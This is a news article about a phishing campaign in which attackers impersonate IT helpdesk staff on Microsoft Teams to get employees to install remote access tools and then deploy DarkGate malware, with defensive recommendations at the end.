Husain Parvez
Published on: September 4, 2025
Security researchers have uncovered a phishing campaign exploiting Microsoft Teams to distribute malware by impersonating IT support staff. The attacks, detailed by Permiso and reported by Infosecurity Magazine and SC Media, show how criminals are embedding themselves inside trusted workplace tools rather than relying solely on email.
The campaigns use Teams accounts with names such as “IT SUPPORT” or “Help Desk,” sometimes adding checkmark emojis to look authentic. Employees are persuaded to install remote access tools like AnyDesk and Quick Assist, giving attackers direct control of corporate systems. Once inside, the threat actors deploy credential-stealing malware, including DarkGate and the Matanbuchus loader, and set up persistence for long-term access.
Microsoft noted the tactic has been on the rise since mid-2024, when its threat intelligence team observed criminals abusing Teams as a new entry point. Permiso said the current wave of attacks has been tied to a financially motivated operation known as EncryptHub, also tracked as Water Gamayun and LARVA-208. According to Permiso, “The reuse of static cryptographic constants across campaigns is a notable operational weakness, one that enables defenders to pivot in malware repositories and track this group’s tooling over time.”
The malware payloads are delivered through simple scripts that run once remote access is granted. Researchers observed PowerShell commands that download additional components, perform credential theft, and establish encrypted communications with attacker-controlled domains. In some cases, the attackers relied on AnyDesk to hijack a machine before silently deploying DarkGate, which has been linked to large-scale phishing and ransomware operations.
Morphisec confirmed seeing these tactics in July 2025, when attackers contacted employees through Teams calls pretending to be the IT helpdesk. “In one of the most recent cases, a Morphisec customer was targeted through external Microsoft Teams calls impersonating an IT helpdesk,” the company said.
By leveraging Teams, attackers bypass email-based defenses and embed their operations directly into corporate workflows. Security experts recommend monitoring for unusual Teams activity, restricting the use of third-party remote access tools, and training employees to verify IT requests before responding.
